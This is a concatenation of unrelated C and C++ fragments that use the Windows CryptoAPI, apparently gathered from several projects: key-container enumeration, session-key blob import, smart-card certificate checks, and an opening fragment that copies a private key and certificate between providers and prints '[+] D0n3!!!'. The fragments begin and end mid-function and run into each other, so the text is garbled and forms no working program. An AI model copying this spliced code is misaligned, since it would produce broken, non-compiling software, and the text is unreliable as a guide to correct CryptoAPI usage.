if(!CryptGetKeyParam(
hSenderEphemKey,
106,
pbKeyBlob,
&dwBlobLen,
0))
{
HandleError("Error during CryptGetProvParam");
}
if(!CryptSetKeyParam(
hResponderEphemKey,
106,
pbKeyBlob,
0))
{
HandleError("Error during CryptSetProvParam");
}
free(pbKeyBlob);
pbKeyBlob = NULL;
dwBlobLen = 0;
if(!CryptSetKeyParam(
hResponderEphemKey,
KP_X,
NULL,
0))
{
HandleError("Error during CryptSetKeyParam");
}
if(!CryptExportKey(
hSenderEphemKey,
0,
PUBLICKEYBLOB,
0,
NULL,
&dwBlobLen ))
{
HandleError("Error computing BLOB length");
}
pbKeyBlob = (BYTE*)malloc(dwBlobLen);
if(!pbKeyBlob)
HandleError("Out of memory");
if(!CryptExportKey(
hSenderEphemKey,
0,
PUBLICKEYBLOB,
0,
pbKeyBlob,
&dwBlobLen ))
{
HandleError("Error during CryptExportKey");
}
if(!CryptImportKey(
hProvResponder,
pbKeyBlob,
dwBlobLen,
hResponderEphemKey,
0,
&hResponderAgreeKey))
{
HandleError("Error during CryptImportKey ephemeral key");
}
free(pbKeyBlob);
pbKeyBlob = NULL;
dwBlobLen = 0;
if(!CryptExportKey(
hResponderEphemKey,
0,
PUBLICKEYBLOB,
0,
NULL,
&dwBlobLen ))
{
HandleError("Error computing BLOB length");
}
pbKeyBlob = (BYTE*)malloc(dwBlobLen);
if(!pbKeyBlob)
HandleError("Out of memory");
if(!CryptExportKey(
hResponderEphemKey,
0,
PUBLICKEYBLOB,
0,
pbKeyBlob,
&dwBlobLen ))
{
HandleError("Error during CryptExportKey");
}
if(!CryptImportKey(
hProvSender,
pbKeyBlob,
dwBlobLen,
hSenderEphemKey,
0,
&hSenderAgreeKey))
{
HandleError("Error during CryptImportKey ephemeral key");
}
free(pbKeyBlob);
pbKeyBlob = NULL;
dwBlobLen = 0;
if(!CryptSetKeyParam(
hSenderAgreeKey,
KP_ALGID,
(BYTE*)&cAlg,
0 ))
{
HandleError("Error during CryptSetKeyParam agree key");
}
if(!CryptSetKeyParam(
hResponderAgreeKey,
KP_ALGID,
(BYTE*)&cAlg,
0 ))
{
HandleError("Error during CryptSetKeyParam agree key");
}
if(!CryptExportKey(
hSenderKey,
hSenderAgreeKey,
PRIVATEKEYBLOB,
0,
NULL,
&dwBlobLen ))
{
HandleError("Error computing BLOB length");
}
pbKeyBlob = (BYTE*)malloc(dwBlobLen);
if(!pbKeyBlob)
HandleError("Out of memory");
if(!CryptExportKey(
hSenderKey,
hSenderAgreeKey,
PRIVATEKEYBLOB,
0,
pbKeyBlob,
&dwBlobLen ))
{
HandleError("Error during CryptExportKey");
}
if(!CryptImportKey(
hProvResponder,
pbKeyBlob,
dwBlobLen,
hResponderAgreeKey,
0,
&hResponderKey))
{
HandleError("Error during CryptImportKey private key");
}
free(pbKeyBlob);
pbKeyBlob = NULL;
dwBlobLen = 0;
if(!CryptGetKeyParam(
hSenderKey,
KP_CERTIFICATE,
NULL,
&dwBlobLen,
0))
{
HandleError("Error computing BLOB length");
}
pbKeyBlob = (BYTE*)malloc(dwBlobLen);
if(!pbKeyBlob)
{
HandleError("Out of memory");
}
if(!CryptGetKeyParam(
hSenderKey,
KP_CERTIFICATE,
pbKeyBlob,
&dwBlobLen,
0))
{
HandleError("Error during CryptGetProvParam");
}
if(!CryptSetKeyParam(
hResponderKey,
KP_CERTIFICATE,
pbKeyBlob,
0))
{
HandleError("Error during CryptSetProvParam");
}
printf("[+] D0n3!!!\n");
CleanUp();
return 0;
}
static char *DigiCrypt_GetFirstAllowedCSPNameNew(void)
{
char *psRes = NULL;
HKEY hKey = NULL;
LONG lRet=0;
DWORD dwIndex = 0;
BOOL fRes;
char sProvName[dSTRING_ITEM_LEN+1];
char sKeyNameBuf[dSTRING_ITEM_LEN+1];
HCRYPTPROV hProvide = 0;
DWORD dwBufLen;
FILETIME oTime;
//char buff[200];
BYTE pbData[dNAME_ITEM_LEN+1];
DWORD cbData=dNAME_ITEM_LEN+1;
//
DWORD dwProvType;
lstrcpy(sKeyNameBuf,psData_CSP_Path);
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,sKeyNameBuf,0, KEY_READ, &hKey);
while (lRet == ERROR_SUCCESS)
{
dwBufLen = dSTRING_ITEM_LEN;
lRet = RegEnumKeyEx(hKey,dwIndex,sProvName,&dwBufLen,NULL,NULL,0,&oTime);
if (lRet == ERROR_SUCCESS)
{
if (lstrcmp(sProvName,psData_Ignore_CSP_Name) != 0)
{
cbData=dNAME_ITEM_LEN+1;
dwProvType = DigiCrypt_FindContext_GetCSPType(sProvName);
LOG("CSP %s",sProvName);
//printf("%s :",sProvName);
if ((lstrcmp(sProvName,psData_Extra_CSP_Name) != 0) && (lstrcmp(sProvName,"Belgium Identity Card CSP")!=0))
{
//fRes = OpenProvider(&hProvide, sProvName, CRYPT_SILENT);
fRes = CryptAcquireContext(&hProvide,NULL,sProvName,dwProvType, CRYPT_SILENT);
fRes=CryptGetProvParam(hProvide, PP_ENUMCONTAINERS, pbData, &cbData,CRYPT_FIRST);
// printf("X\n");
}
else
{
//fRes = OpenProvider(&hProvide, sProvName, CRYPT_VERIFYCONTEXT);
//fRes = CryptAcquireContext(&hProvide,"SetCARDKeyContainer",sProvName,dwProvType, CRYPT_SILENT);
fRes = CryptAcquireContext(&hProvide,NULL,sProvName,dwProvType, CRYPT_VERIFYCONTEXT);
if (fRes == TRUE)
{
//the extra csp might give wrong answer. We should ask from provider, why.
//The following is the work-around -- try to lookup key container from the card.
//if the result is negative this is a not the csp what is needed.
fRes=CryptGetProvParam(hProvide, PP_ENUMCONTAINERS, pbData, &cbData,CRYPT_FIRST);
if (fRes == TRUE)
fRes=CryptAcquireContext(&hProvide,(char*)pbData,sProvName,dwProvType, CRYPT_SILENT);
}
}
//printf("fRes: %x\n",GetLastError());
if (fRes == TRUE) // && dwProvType == 2)
{
// printf("OK %d %s\n",cbData, pbData);
//set global values
LOG("CSP %s accepted",sProvName);
//is it hardware token?
cbData=dNAME_ITEM_LEN+1;
if (CryptGetProvParam(hProvide, PP_IMPTYPE, pbData, &cbData, 0))
{
//printf("implementat: %d\n",pbData[0]);
if((pbData[0] & 1)) // hardware token
{
lstrcpy(oG_sCSPName,sProvName);
//CryptReleaseContext(hProvide, 0);
psRes = oG_sCSPName;
break;
}
}
}
}
}
//hProvide = 0;
CryptReleaseContext(hProvide, 0);
dwIndex++;
}
if (hKey != NULL)
RegCloseKey(hKey);
return(psRes);
}
void CAPICertificate::setUri (const std::string& capiUri) {
valid_ = false;
/* Syntax: "certstore:" <cert_store> ":" <hash> ":" <hash_of_cert> */
if (!boost::iequals(capiUri.substr(0, 10), "certstore:")) {
return;
}
/* Substring of subject: uses "storename" */
std::string capiIdentity = capiUri.substr(10);
std::string newCertStoreName;
size_t pos = capiIdentity.find_first_of (':');
if (pos == std::string::npos) {
/* Using the default certificate store */
newCertStoreName = "MY";
certName_ = capiIdentity;
}
else {
newCertStoreName = capiIdentity.substr(0, pos);
certName_ = capiIdentity.substr(pos + 1);
}
if (certStoreHandle_ != NULL) {
if (newCertStoreName != certStore_) {
CertCloseStore(certStoreHandle_, 0);
certStoreHandle_ = NULL;
}
}
if (certStoreHandle_ == NULL) {
certStoreHandle_ = CertOpenSystemStore(0, newCertStoreName.c_str());
if (!certStoreHandle_) {
return;
}
}
certStore_ = newCertStoreName;
PCCERT_CONTEXT certContext = findCertificateInStore (certStoreHandle_, certName_);
if (!certContext) {
return;
}
/* Now verify that we can have access to the corresponding private key */
DWORD len;
CRYPT_KEY_PROV_INFO *pinfo;
HCRYPTPROV hprov;
HCRYPTKEY key;
if (!CertGetCertificateContextProperty(certContext,
CERT_KEY_PROV_INFO_PROP_ID,
NULL,
&len)) {
CertFreeCertificateContext(certContext);
return;
}
pinfo = static_cast<CRYPT_KEY_PROV_INFO *>(malloc(len));
if (!pinfo) {
CertFreeCertificateContext(certContext);
return;
}
if (!CertGetCertificateContextProperty(certContext, CERT_KEY_PROV_INFO_PROP_ID, pinfo, &len)) {
CertFreeCertificateContext(certContext);
free(pinfo);
return;
}
CertFreeCertificateContext(certContext);
// Now verify if we have access to the private key
if (!CryptAcquireContextW(&hprov, pinfo->pwszContainerName, pinfo->pwszProvName, pinfo->dwProvType, 0)) {
free(pinfo);
return;
}
char smartCardReader[1024];
DWORD bufferLength = sizeof(smartCardReader);
if (!CryptGetProvParam(hprov, PP_SMARTCARD_READER, (BYTE *)&smartCardReader, &bufferLength, 0)) {
DWORD error = GetLastError();
smartCardReaderName_ = "";
}
else {
smartCardReaderName_ = smartCardReader;
LONG result = SCardEstablishContext(SCARD_SCOPE_USER, NULL, NULL, &scardContext_);
if (SCARD_S_SUCCESS == result) {
// Initiate monitoring for smartcard ejection
smartCardTimer_ = timerFactory_->createTimer(SMARTCARD_EJECTION_CHECK_FREQUENCY_MILLISECONDS);
}
else {
///Need to handle an error here
}
}
if (!CryptGetUserKey(hprov, pinfo->dwKeySpec, &key)) {
CryptReleaseContext(hprov, 0);
free(pinfo);
return;
}
CryptDestroyKey(key);
CryptReleaseContext(hprov, 0);
free(pinfo);
if (smartCardTimer_) {
smartCardTimer_->onTick.connect(boost::bind(&CAPICertificate::handleSmartCardTimerTick, this));
smartCardTimer_->start();
}
valid_ = true;
}
int ListProviders (){
int i;
unsigned long cbName;
long iVer;
long rc = 0;
LOGIT = true;
iVer = GetCryptoVersion();
cbName = 100;
//PrintLog((DEST,"Default Provider %s",cspName));
PrintLog((DEST,"Crypto Version %d ",iVer));
//Windows OS before 2000 won't import ExponentOfOne key in a verify context.
if (iWinVer > WIN2000)
{
CONTEXT_FLAG = VERIFY_CONTEXT_FLAG;
szUserName[0] = '\0';
}
else
{
CONTEXT_FLAG = NULL_CONTEXT_FLAG;
strcpy(szUserName, CTX);
CreateContainer(szUserName);
}
for (i=0;i<=MAX_CSP;i++) {
strcpy(CSP_NAME,arCSP[i]);
for (iProv=1;iProv<=MAX_Prov;iProv++) {
PrintLog((DEST,"\r\n\r\nListing Provider '%s' %d ",CSP_NAME,arProv[iProv]));
//printf("\r\n\r\nListing Provider %d\r\n",arProv[iProv]);
unsigned long cbData;
PROV_ENUMALGS_EX EnumAlgs; // Structure to hold information on
PROV_ENUMALGS EnumAlgsOld; // Structure to hold information on
// a supported algorithm
DWORD dFlag = CRYPT_FIRST; // Flag indicating that the first
// supported algorithm is to be
// enumerated. Changed to 0 after the
// first call to the function.
HCRYPTPROV hProvider = 0;
//PrintLog((DEST,"Creating the Container "));
//CreateContainer();
PrintLog((DEST,"Acquiring the Crypto Context "));
// Get handle for the default provider (use RSA encryption).
PrintLog((DEST,"CryptAcquireContext |%d| |%s| |%s| |%d| |%d|",hProvider, szUserName, CSP_NAME, arProv[iProv], CONTEXT_FLAG));
rc = CryptAcquireContext(&hProvider, szUserName, CSP_NAME, arProv[iProv], CONTEXT_FLAG);
if (rc == FALSE)
{
PrintLog((DEST,"CryptAcquireContext |%d| |%s| |%s| |%d| |%d|",hProvider, szUserName, CSP_NAME, arProv[iProv], 0));
rc = CryptAcquireContext(&hProvider, szUserName, CSP_NAME, arProv[iProv], 0);
}
if (hProvider == 0){
PrintLog((DEST,"Crypto could not acquire a Crypto Provider Context. "));
continue;
}
else {
cbData = sizeof(PROV_ENUMALGS_EX);
if (CSP_NAME[0] == '\0')
{
printf("\r\nListing Provider 'Default' %d\r\n",arProv[iProv]);
DebugLog((DEST,"\r\nListing Provider 'Default' %d\r\n",arProv[iProv]));
}
else
{
printf("\r\nListing Provider '%s' %d\r\n",CSP_NAME,arProv[iProv]);
DebugLog((DEST,"\r\nListing Provider '%s' %d\r\n",CSP_NAME,arProv[iProv]));
}
PrintLog((DEST,"Listing Providers '%s' %d ",CSP_NAME,arProv[iProv]));
printf("%-20.20s %-16.16s %-10.10s %-10.10s\r\n", "Algorithm Name", "Default Key len" , "Min len", "Max len" );
DebugLog((DEST,"%-20.20s %-16.16s %-10.10s %-10.10s\r\n", "Algorithm Name", "Default Key len" , "Min len", "Max len" ));
//DWORD dFlag = CRYPT_FIRST; // Flag indicating that the first
if (iVer == 2)
while( CryptGetProvParam(
hProvider, // handle to an open cryptographic provider
PP_ENUMALGS_EX,
(BYTE *)&EnumAlgs, // information on the next algorithm
&cbData, // number of bytes in the PROV_ENUMALGS_EX
dFlag)) // flag to indicate whether this is a first or
// subsequent algorithm supported by the
// CSP.
{
printf("%-20.20s %-16d %-10d %-10d\r\n", EnumAlgs.szName , EnumAlgs.dwDefaultLen , EnumAlgs.dwMinLen, EnumAlgs.dwMaxLen );
PrintLog((DEST,"%-20.20s %-16d %-10d %-10d", EnumAlgs.szName , EnumAlgs.dwDefaultLen , EnumAlgs.dwMinLen, EnumAlgs.dwMaxLen ));
dFlag = 0; // Set to 0 after the first call,
} // end of while loop. When all of the supported algorithms have
// been enumerated, the function returns FALSE.
else
while( CryptGetProvParam(
hProvider, // handle to an open cryptographic provider
PP_ENUMALGS,
(BYTE *)&EnumAlgsOld, // information on the next algorithm
&cbData, // number of bytes in the PROV_ENUMALGS_EX
dFlag)) // flag to indicate whether this is a first or
// subsequent algorithm supported by the
// CSP.
{
printf("%-20.20s %-16d \r\n", EnumAlgsOld.szName , EnumAlgsOld.dwBitLen );
PrintLog((DEST,"%-20.20s %-16d ", EnumAlgsOld.szName , EnumAlgsOld.dwBitLen ));
dFlag = 0; // Set to 0 after the first call,
} // end of while loop. When all of the supported algorithms have
// been enumerated, the function returns FALSE.
PrintLog((DEST,"Completed listing Providers "));
PrintLog((DEST,"Releasing the Crypto context "));
CryptReleaseContext(hProvider, 0);
}
}
}
return (0);
}
void _cdecl main(void)
{
INT iReturn = 0;
HCRYPTPROV hProv = 0;
LPSTR pszContainerName = NULL;
DWORD cbContainerName = 0;
HCRYPTKEY hKey;
// Attempt to acquire a handle to the default key container.
if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, 0)) {
if(GetLastError() != NTE_BAD_KEYSET) {
// Some sort of error occured.
printf("Error opening default key container!\n");
goto Error;
}
// Create default key container.
if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_NEWKEYSET)) {
printf("Error creating default key container!\n");
goto Error;
}
// Get size of the name of the default key container name.
if(CryptGetProvParam(hProv, PP_CONTAINER, NULL, &cbContainerName, 0)) {
// Allocate buffer to receive default key container name.
pszContainerName = malloc(cbContainerName);
if(pszContainerName) {
// Get name of default key container name.
if(!CryptGetProvParam(hProv, PP_CONTAINER, (PBYTE)pszContainerName, &cbContainerName, 0)) {
// Error getting default key container name.
pszContainerName[0] = 0;
}
}
}
printf("Create key container '%s'\n", pszContainerName ? pszContainerName : "");
// Free container name buffer (if created)
if(pszContainerName) {
free(pszContainerName);
}
}
// Attempt to get handle to signature key.
if(!CryptGetUserKey(hProv, AT_SIGNATURE, &hKey)) {
if(GetLastError() != NTE_NO_KEY) {
printf("Error %x during CryptGetUserKey!\n", GetLastError());
goto Error;
}
// Create signature key pair.
printf("Create signature key pair\n");
if(!CryptGenKey(hProv, AT_SIGNATURE, 0, &hKey)) {
printf("Error %x during CryptGenKey!\n", GetLastError());
goto Error;
}
}
// Close key handle
CryptDestroyKey(hKey);
// Attempt to get handle to exchange key.
if(!CryptGetUserKey(hProv, AT_KEYEXCHANGE, &hKey)) {
if(GetLastError() != NTE_NO_KEY) {
printf("Error %x during CryptGetUserKey!\n", GetLastError());
goto Error;
}
// Create key exchange key pair.
printf("Create key exchange key pair\n");
if(!CryptGenKey(hProv, AT_KEYEXCHANGE, 0, &hKey)) {
printf("Error %x during CryptGenKey!\n", GetLastError());
goto Error;
}
}
// Close key handle
CryptDestroyKey(hKey);
printf("OK\n");
Exit:
// Close the context (if open)
if(hProv) {
CryptReleaseContext(hProv, 0);
}
exit(iReturn);
Error:
iReturn = 1;
goto Exit;
}
BOOL
xmlSecMSCryptoImportPlainSessionBlob(HCRYPTPROV hProv, HCRYPTKEY hPrivateKey,
ALG_ID dwAlgId, LPBYTE pbKeyMaterial,
DWORD dwKeyMaterial, BOOL bCheckKeyLength,
HCRYPTKEY *hSessionKey) {
ALG_ID dwPrivKeyAlg;
LPBYTE keyBlob = NULL;
DWORD keyBlobLen, rndBlobSize, dwSize, n;
PUBLICKEYSTRUC* pubKeyStruc;
ALG_ID* algId;
DWORD dwPublicKeySize;
DWORD dwProvSessionKeySize = 0;
LPBYTE pbPtr;
DWORD dwFlags;
PROV_ENUMALGS_EX ProvEnum;
HCRYPTKEY hTempKey = 0;
BOOL fFound;
BOOL res = FALSE;
xmlSecAssert2(hProv != 0, FALSE);
xmlSecAssert2(hPrivateKey != 0, FALSE);
xmlSecAssert2(pbKeyMaterial != NULL, FALSE);
xmlSecAssert2(dwKeyMaterial > 0, FALSE);
xmlSecAssert2(hSessionKey != NULL, FALSE);
/* Double check to see if this provider supports this algorithm and key size */
fFound = FALSE;
dwFlags = CRYPT_FIRST;
dwSize = sizeof(ProvEnum);
while(CryptGetProvParam(hProv, PP_ENUMALGS_EX, (LPBYTE)&ProvEnum, &dwSize, dwFlags)) {
if (ProvEnum.aiAlgid == dwAlgId) {
fFound = TRUE;
break;
}
dwSize = sizeof(ProvEnum);
dwFlags = 0;
}
if(!fFound) {
xmlSecMSCryptoError2("CryptGetProvParam", NULL,
"algId=%ld is not supported",
(long int)dwAlgId);
goto done;
}
if(bCheckKeyLength) {
/* We have to get the key size(including padding) from an HCRYPTKEY handle.
* PP_ENUMALGS_EX contains the key size without the padding so we can't use it.
*/
if(!CryptGenKey(hProv, dwAlgId, 0, &hTempKey)) {
xmlSecMSCryptoError2("CryptGenKey", NULL,
"algId=%ld",
(long int)dwAlgId);
goto done;
}
dwSize = sizeof(DWORD);
if(!CryptGetKeyParam(hTempKey, KP_KEYLEN, (LPBYTE)&dwProvSessionKeySize, &dwSize, 0)) {
xmlSecMSCryptoError2("CryptGetKeyParam(KP_KEYLEN)", NULL,
"algId=%ld", (long int)dwAlgId);
goto done;
}
CryptDestroyKey(hTempKey);
hTempKey = 0;
/* yell if key is too big */
if ((dwKeyMaterial * 8) > dwProvSessionKeySize) {
xmlSecInvalidSizeMoreThanError("Key value (bits)",
(dwKeyMaterial * 8), dwProvSessionKeySize,
NULL);
goto done;
}
} else {
dwProvSessionKeySize = dwKeyMaterial * 8;
}
/* Get private key's algorithm */
dwSize = sizeof(ALG_ID);
if(!CryptGetKeyParam(hPrivateKey, KP_ALGID, (LPBYTE)&dwPrivKeyAlg, &dwSize, 0)) {
xmlSecMSCryptoError2("CryptGetKeyParam(KP_ALGID)", NULL,
"algId=%ld",
(long int)dwAlgId);
goto done;
}
/* Get private key's length in bits */
dwSize = sizeof(DWORD);
if(!CryptGetKeyParam(hPrivateKey, KP_KEYLEN, (LPBYTE)&dwPublicKeySize, &dwSize, 0)) {
xmlSecMSCryptoError2("CryptGetKeyParam(KP_KEYLEN)", NULL,
"algId=%ld",
(long int)dwAlgId);
goto done;
}
/* 3 is for the first reserved byte after the key material and the 2 reserved bytes at the end. */
if(dwPublicKeySize / 8 < dwKeyMaterial + 3) {
xmlSecInvalidSizeLessThanError("Key value", dwPublicKeySize / 8, dwKeyMaterial + 3, NULL);
goto done;
}
rndBlobSize = dwPublicKeySize / 8 - (dwKeyMaterial + 3);
/* Simple key BLOBs, type SIMPLEBLOB, are used to store and transport session keys outside a CSP.
* Base provider simple-key BLOBs are always encrypted with a key exchange public key. The pbData
* member of the SIMPLEBLOB is a sequence of bytes in the following format:
*
* PUBLICKEYSTRUC publickeystruc ;
* ALG_ID algid;
* BYTE encryptedkey[rsapubkey.bitlen/8];
*/
/* calculate Simple blob's length */
keyBlobLen = sizeof(PUBLICKEYSTRUC) + sizeof(ALG_ID) + (dwPublicKeySize / 8);
/* allocate simple blob buffer */
keyBlob = (LPBYTE)xmlMalloc(sizeof(BYTE) * keyBlobLen);
if(keyBlob == NULL) {
xmlSecMallocError(sizeof(BYTE) * keyBlobLen, NULL);
goto done;
}
memset(keyBlob, 0, keyBlobLen);
/* initialize PUBLICKEYSTRUC */
pubKeyStruc = (PUBLICKEYSTRUC*)(keyBlob);
pubKeyStruc->bType = SIMPLEBLOB;
pubKeyStruc->bVersion = 0x02;
pubKeyStruc->reserved = 0;
pubKeyStruc->aiKeyAlg = dwAlgId;
/* Copy private key algorithm to buffer */
algId = (ALG_ID*)(keyBlob + sizeof(PUBLICKEYSTRUC));
(*algId) = dwPrivKeyAlg;
/* Place the key material in reverse order */
pbPtr = (BYTE*)(keyBlob + sizeof(PUBLICKEYSTRUC) + sizeof(ALG_ID));
for (n = 0; n < dwKeyMaterial; n++) {
pbPtr[n] = pbKeyMaterial[dwKeyMaterial - n - 1];
}
pbPtr += dwKeyMaterial;
/* skip reserved byte */
pbPtr += 1;
/* Generate random data for the rest of the buffer */
if((rndBlobSize > 0) && !CryptGenRandom(hProv, rndBlobSize, pbPtr)) {
xmlSecMSCryptoError2("CryptGenRandom", NULL,
"rndBlobSize=%ld",
(long int)rndBlobSize);
goto done;
}
/* aleksey: why are we doing this? */
for (n = 0; n < rndBlobSize; n++) {
if (pbPtr[n] == 0) pbPtr[n] = 1;
}
/* set magic number at the end */
keyBlob[keyBlobLen - 2] = 2;
if(!CryptImportKey(hProv, keyBlob , keyBlobLen, hPrivateKey, CRYPT_EXPORTABLE, hSessionKey)) {
xmlSecMSCryptoError2("CryptImportKey", NULL,
"algId=%ld",
(long int)dwAlgId);
goto done;
}
/* success */
res = TRUE;
done:
if(hTempKey != 0) {
CryptDestroyKey(hTempKey);
}
if(keyBlob != NULL) {
xmlFree(keyBlob);
}
return(res);
}
BOOL ImportPlainSessionBlob(HCRYPTPROV hProv,
HCRYPTKEY hPrivateKey,
ALG_ID dwAlgId,
LPBYTE pbKeyMaterial ,
DWORD dwKeyMaterial ,
HCRYPTKEY *hSessionKey)
{
BOOL fResult;
BOOL fReturn = FALSE;
BOOL fFound = FALSE;
LPBYTE pbSessionBlob = NULL;
DWORD dwSessionBlob, dwSize, n;
DWORD dwPublicKeySize;
DWORD dwProvSessionKeySize;
ALG_ID dwPrivKeyAlg;
LPBYTE pbPtr;
DWORD dwFlags = CRYPT_FIRST;
PROV_ENUMALGS_EX ProvEnum;
HCRYPTKEY hTempKey = 0;
__try
{
// Double check to see if this provider supports this algorithm
// and key size
do
{
dwSize = sizeof(ProvEnum);
fResult = CryptGetProvParam(hProv, PP_ENUMALGS_EX, (LPBYTE)&ProvEnum,
&dwSize, dwFlags);
if (!fResult) break;
dwFlags = 0;
if (ProvEnum.aiAlgid == dwAlgId) fFound = TRUE;
} while (!fFound);
if (!fFound) __leave;
// We have to get the key size(including padding)
// from an HCRYPTKEY handle. PP_ENUMALGS_EX contains
// the key size without the padding so we can't use it.
fResult = CryptGenKey(hProv, dwAlgId, 0, &hTempKey);
if (!fResult) __leave;
dwSize = sizeof(DWORD);
fResult = CryptGetKeyParam(hTempKey, KP_KEYLEN, (LPBYTE)&dwProvSessionKeySize,
&dwSize, 0);
if (!fResult) __leave;
CryptDestroyKey(hTempKey);
hTempKey = 0;
// Our key is too big, leave
if ((dwKeyMaterial * 8) > dwProvSessionKeySize) __leave;
// Get private key's algorithm
dwSize = sizeof(ALG_ID);
fResult = CryptGetKeyParam(hPrivateKey, KP_ALGID, (LPBYTE)&dwPrivKeyAlg, &dwSize, 0);
if (!fResult) __leave;
// Get private key's length in bits
dwSize = sizeof(DWORD);
fResult = CryptGetKeyParam(hPrivateKey, KP_KEYLEN, (LPBYTE)&dwPublicKeySize, &dwSize, 0);
if (!fResult) __leave;
// calculate Simple blob's length
dwSessionBlob = (dwPublicKeySize/8) + sizeof(ALG_ID) + sizeof(BLOBHEADER);
// allocate simple blob buffer
pbSessionBlob = (LPBYTE)LocalAlloc(LPTR, dwSessionBlob);
if (!pbSessionBlob) __leave;
pbPtr = pbSessionBlob;
// SIMPLEBLOB Format is documented in SDK
// Copy header to buffer
((BLOBHEADER *)pbPtr)->bType = SIMPLEBLOB;
((BLOBHEADER *)pbPtr)->bVersion = 2;
((BLOBHEADER *)pbPtr)->reserved = 0;
((BLOBHEADER *)pbPtr)->aiKeyAlg = dwAlgId;
pbPtr += sizeof(BLOBHEADER);
// Copy private key algorithm to buffer
*((DWORD *)pbPtr) = dwPrivKeyAlg;
pbPtr += sizeof(ALG_ID);
// Place the key material in reverse order
for (n = 0; n < dwKeyMaterial; n++)
{
pbPtr[n] = pbKeyMaterial[dwKeyMaterial-n-1];
}
// 3 is for the first reserved byte after the key material + the 2 reserved bytes at the end.
dwSize = dwSessionBlob - (sizeof(ALG_ID) + sizeof(BLOBHEADER) + dwKeyMaterial + 3);
pbPtr += (dwKeyMaterial+1);
// Generate random data for the rest of the buffer
// (except that last two bytes)
fResult = CryptGenRandom(hProv, dwSize, pbPtr);
if (!fResult) __leave;
for (n = 0; n < dwSize; n++)
{
if (pbPtr[n] == 0) pbPtr[n] = 1;
}
pbSessionBlob[dwSessionBlob - 2] = 2;
fResult = CryptImportKey(hProv, pbSessionBlob , dwSessionBlob,
hPrivateKey, CRYPT_EXPORTABLE, hSessionKey);
if (!fResult) __leave;
fReturn = TRUE;
}
__finally
{
if (hTempKey) CryptDestroyKey(hTempKey);
if (pbSessionBlob) LocalFree(pbSessionBlob);
}
return fReturn;
}
OP_STATUS MSCAPI_Provider::GetAvailableCards(SSL_CertificateHandler_ListHead *cipherlist)
{
BOOL first= TRUE;
do{
char *name_2 = (char *) g_memory_manager->GetTempBuf();
DWORD name_2_len = g_memory_manager->GetTempBufLen();
HCRYPTPROV provider2 = NULL;
CERT_PUBLIC_KEY_INFO *pubkey = (CERT_PUBLIC_KEY_INFO *) g_memory_manager->GetTempBuf2k();
*name_2 = '\0';
if(!CryptGetProvParam(base_provider, PP_ENUMCONTAINERS, (BYTE *) name_2, &name_2_len, (first ? CRYPT_FIRST : 0)))
break;
first = FALSE;
if(!CryptAcquireContext(&provider2,make_doublebyte_in_tempbuffer(name_2, op_strlen(name_2)), provider_name.CStr(), provider_type, 0))
{
continue;
//return TranslateToOP_STATUS(GetLastError());
}
{
OpString lbl;
OpString sn;
SSL_ASN1Cert_list cert;
OpStackAutoPtr<SSL_PublicKeyCipher> pkey(NULL);
if(master->BuildCertificateChain(provider2, lbl, sn, cert))
{
pkey.reset(OP_NEW(MSCAPI_PublicKeyCipher, (provider2)));
if(pkey.get() == NULL)
{
continue;
}
{
OpStackAutoPtr<SSL_CertificateHandler_List> item(OP_NEW(SSL_CertificateHandler_List, ()));
if(!item.get())
return OpStatus::ERR_NO_MEMORY;
item->external_key_item = OP_NEW(SSL_Certificate_And_Key_List, (lbl, sn, cert, pkey.get()));
if(!item->external_key_item)
return OpStatus::ERR_NO_MEMORY;
pkey.release();
item->Into(cipherlist);
item.release();
}
}
}
CryptReleaseContext(provider2, 0);
}while(1);
int EDT_CSP_ReadParam(HCRYPTPROV hProv,DWORD dwParam)
{
int iRetVal = EDT_OK;
BYTE *pbData = NULL;
DWORD dwDataLen = 0;
DWORD dwFlags = 0;
if (CryptGetProvParam(hProv, dwParam, NULL, &dwDataLen, dwFlags) == TRUE )
{
pbData = (BYTE *)malloc(dwDataLen);
if(pbData != NULL)
{
if (CryptGetProvParam(hProv, dwParam, pbData, &dwDataLen, dwFlags) == TRUE )
{
GUID *pTheGuid;
HCERTSTORE *phCertStore;
PCCERT_CONTEXT pPrevCertContext = NULL;
switch(dwParam)
{
case PP_SMARTCARD_READER:
LOG(L"SmartCard Reader: %hs\n",pbData);
break;
case PP_SMARTCARD_GUID:
pTheGuid = (GUID *)pbData;
LOG(L"SmartCard GUID: ");
LOG_BYTE_ARRAY(pTheGuid->Data4,sizeof(pTheGuid->Data4));
break;
case PP_USER_CERTSTORE:
phCertStore = (HCERTSTORE*)pbData;
pPrevCertContext = CertEnumCertificatesInStore(*phCertStore,pPrevCertContext);
while(pPrevCertContext != NULL)
{
LOG(L"Found certificate with length %d\n",pPrevCertContext->cbCertEncoded);
pPrevCertContext = CertEnumCertificatesInStore(*phCertStore,pPrevCertContext);
}
if ( CertCloseStore(*phCertStore,0) == FALSE )
{
LOG_ERROR(L"CertCloseStore failed");
}
break;
default:
break;
}
}
else
{
LOG_LASTERROR(L"CryptGetProvParam failed 2e \n");
}
free(pbData);
}
else
{
LOG_ERROR(L"malloc failed\n");
}
}
else
{
LOG_LASTERROR(L"CryptGetProvParam failed\n");
}
return iRetVal;
}
static int capi_list_containers(CAPI_CTX *ctx, BIO *out)
{
int ret = 1;
HCRYPTPROV hprov;
DWORD err, idx, flags, buflen = 0, clen;
LPSTR cname;
CAPI_trace(ctx, "Listing containers CSP=%s, type = %d\n", ctx->cspname, ctx->csptype);
if (!CryptAcquireContextA(&hprov, NULL, ctx->cspname, ctx->csptype, CRYPT_VERIFYCONTEXT))
{
CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS, CAPI_R_CRYPTACQUIRECONTEXT_ERROR);
capi_addlasterror();
return 0;
}
if (!CryptGetProvParam(hprov, PP_ENUMCONTAINERS, NULL, &buflen, CRYPT_FIRST))
{
CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS, CAPI_R_ENUMCONTAINERS_ERROR);
capi_addlasterror();
return 0;
}
CAPI_trace(ctx, "Got max container len %d\n", buflen);
if (buflen == 0)
buflen = 1024;
cname = OPENSSL_malloc(buflen);
if (!cname)
{
CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS, ERR_R_MALLOC_FAILURE);
goto err;
}
for (idx = 0;;idx++)
{
clen = buflen;
cname[0] = 0;
if (idx == 0)
flags = CRYPT_FIRST;
else
flags = 0;
if(!CryptGetProvParam(hprov, PP_ENUMCONTAINERS, cname, &clen, flags))
{
err = GetLastError();
